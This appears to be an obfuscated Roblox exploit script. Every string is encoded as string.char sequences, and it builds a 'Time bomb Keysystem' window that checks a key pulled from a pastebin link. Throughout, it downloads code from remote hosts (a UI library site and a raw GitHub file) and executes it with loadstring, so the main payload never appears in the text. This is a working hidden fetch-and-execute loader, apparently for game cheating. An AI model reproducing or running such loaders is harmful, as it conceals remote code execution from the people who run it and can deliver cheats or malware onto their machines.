loadstring((function()
local a=string.char;local b=table.concat;local c=loadstring;local d=game.HttpGet;local f=request or syn.request or http_request;local e=pcall;
local i=b{a(104),a(116),a(116),a(112),a(115),a(58),a(47),a(47),a(115),a(105),a(114),a(105),a(117),a(115),a(46),a(109),a(101),a(110),a(117),a(47),a(114),a(97),a(121),a(102),a(105),a(101),a(108),a(100)};
local h=b{a(104),a(116),a(116),a(112),a(115),a(58),a(47),a(47),a(114),a(97),a(119),a(46),a(103),a(105),a(116),a(104),a(117),a(98),a(117),a(115),a(101),a(114),a(99),a(111),a(110),a(116),a(101),a(110),a(116),a(46),a(99),a(111),a(109),a(47),a(101),a(115),a(109),a(117),a(104),a(97),a(110),a(111),a(118),a(109),a(117),a(104),a(97),a(109),a(109),a(101),a(100),a(97),a(108),a(105),a(52),a(55),a(45),a(104),a(117),a(98),a(47),a(84),a(101),a(115),a(116),a(47),a(114),a(101),a(102),a(115),a(47),a(104),a(101),a(97),a(100),a(115),a(47),a(109),a(97),a(105),a(110),a(47),a(86),a(51)};
local g=b{a(104),a(116),a(116),a(112),a(115),a(58),a(47),a(47),a(112),a(97),a(115),a(116),a(101),a(98),a(105),a(110),a(46),a(99),a(111),a(109),a(47),a(114),a(97),a(119),a(47),a(104),a(122),a(84),a(105),a(84),a(114),a(103),a(66)};
local j=c(d(game,i))();
local k=j:CreateWindow({Name=b{a(84),a(105),a(109),a(101),a(32),a(98),a(111),a(109),a(98),a(32),a(75),a(101),a(121),a(115),a(121),a(115),a(116),a(101),a(109)},LoadingTitle=b{a(84),a(105),a(109),a(101),a(32),a(98),a(111),a(109),a(98),a(32),a(75),a(101),a(121),a(115),a(121),a(115),a(116),a(101),a(109)},LoadingSubtitle=b{a(98),a(121),a(32),a(83),a(108),a(105),a(118),a(107),a(105),a(110),a(101),a(101),a(112),a(121)},ConfigurationSaving={Enabled=false},Discord={Enabled=false,Invite="",RememberJoins=true},KeySystem=true,KeySettings={Title=b{a(84),a(105),a(109),a(101),a(32),a(98),a(111),a(109),a(98),a(32),a(75),a(101),a(121),a(115),a(121),a(115),a(116),a(101),a(109)},Subtitle=b{a(69),a(110),a(116),a(101),a(114),a(32),a(107),a(101),a(121),a(32),a(116),a(111),a(32),a(97),a(99),a(99),a(101),a(115),a(115)},Note=b{a(71),a(101),a(116),a(32),a(107),a(101),a(121),a(32),a(102),a(114),a(111),a(109),a(32),a(99),a(114),a(101),a(97),a(116),a(111),a(114)},FileName=b{a(84),a(105),a(109),a(101),a(98),a(111),a(109),a(98),a(75),a(101),a(121)},SaveKey=false,GrabKeyFromSite=true,Key=g}});
j:Notify({Title=b{a(83),a(117),a(99),a(99),a(101),a(115),a(115),a(33)},Content=b{a(75),a(101),a(121),a(32),a(97),a(99),a(99),a(101),a(112),a(116),a(101),a(100),a(46),a(32),a(65),a(99),a(99),a(101),a(115),a(115),a(32),a(103),a(114),a(97),a(110),a(116),a(101),a(100),a(46)},Duration=4,Image=4484899435});
local l=k:CreateTab(b{a(77),a(97),a(105),a(110)},4484899435);
l:CreateButton({Name=b{a(84),a(105),a(109),a(101),a(32),a(98),a(111),a(109),a(98),a(32),a(83),a(99),a(114),a(105),a(112),a(116),a(32),a(71),a(85),a(73)},Info=b{a(76),a(97),a(117),a(110),a(99),a(104),a(101),a(115),a(32),a(109),a(97),a(105),a(110),a(32),a(115),a(99),a(114),a(105),a(112),a(116)},Interact=b{a(76),a(97),a(117),a(110),a(99),a(104)},Callback=function()
task.spawn(function()
if not f then j:Notify({Title="Error",Content="HTTP not supported",Duration=5});return end
local m=f({Url=h,Method="GET"})
if not m or m.StatusCode~=200 then j:Notify({Title="Load Error",Content="Failed: "..tostring(m and m.StatusCode),Duration=6});return end
local s,err=e(function()local func=c(m.Body);if func then func()end end)
if s then j:Notify({Title="Success",Content="Script executed",Duration=3})
else j:Notify({Title="Exec Error",Content=tostring(err),Duration=8})end
task.delay(0,function()j:Destroy()end)
end)
end})
end)())()
